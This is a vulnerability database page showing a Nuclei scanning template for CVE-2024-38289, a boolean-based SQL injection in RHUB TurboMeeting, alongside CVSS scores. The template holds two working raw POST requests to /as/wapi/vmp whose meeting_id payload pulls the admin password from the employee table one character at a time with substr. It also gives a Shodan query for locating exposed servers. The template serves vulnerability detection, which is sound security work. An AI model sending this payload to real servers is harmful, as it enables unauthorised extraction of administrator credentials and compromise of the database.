Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2024-38289
HistoryJul 25, 2024 - 12:01 p.m.

TurboMeeting - Boolean-based SQL Injection

2024-07-2512:01:51
ProjectDiscovery
github.com
14
turbomeeting
boolean-based sql injection
rhub
web application
attacker
arbitrary sql commands
database server
sensitive data
server compromise

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.6

Confidence

Low

EPSS

0.006

Percentile

79.6%

JSON
A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.

id: CVE-2024-38289

info:
  name: TurboMeeting - Boolean-based SQL Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"TurboMeeting"
  tags: cve,cve2024,sqli,turbomeeting

http:
  - raw:
      - |
        POST /as/wapi/vmp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**

      - |
        POST /as/wapi/vmp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '<__Status__>SUCCEED</__Status__>'

      - type: word
        part: body_2
        words:
          - '<__Status__>FAILED</__Status__>'
# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950

Related

cvelist 1
cve 1
nvd 1
vulnrichment 1
cvelist
cvelist
CVE-2024-38289
2024-07-25 00:00:00
cve
cve
CVE-2024-38289
2024-07-25 20:15:05
nvd
nvd
CVE-2024-38289
2024-07-25 20:15:05
vulnrichment
vulnrichment
CVE-2024-38289
2024-07-25 00:00:00

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.6

Confidence

Low

EPSS

0.006

Percentile

79.6%

JSON
Related for NUCLEI:CVE-2024-38289
cvelist1cve1nvd1vulnrichment1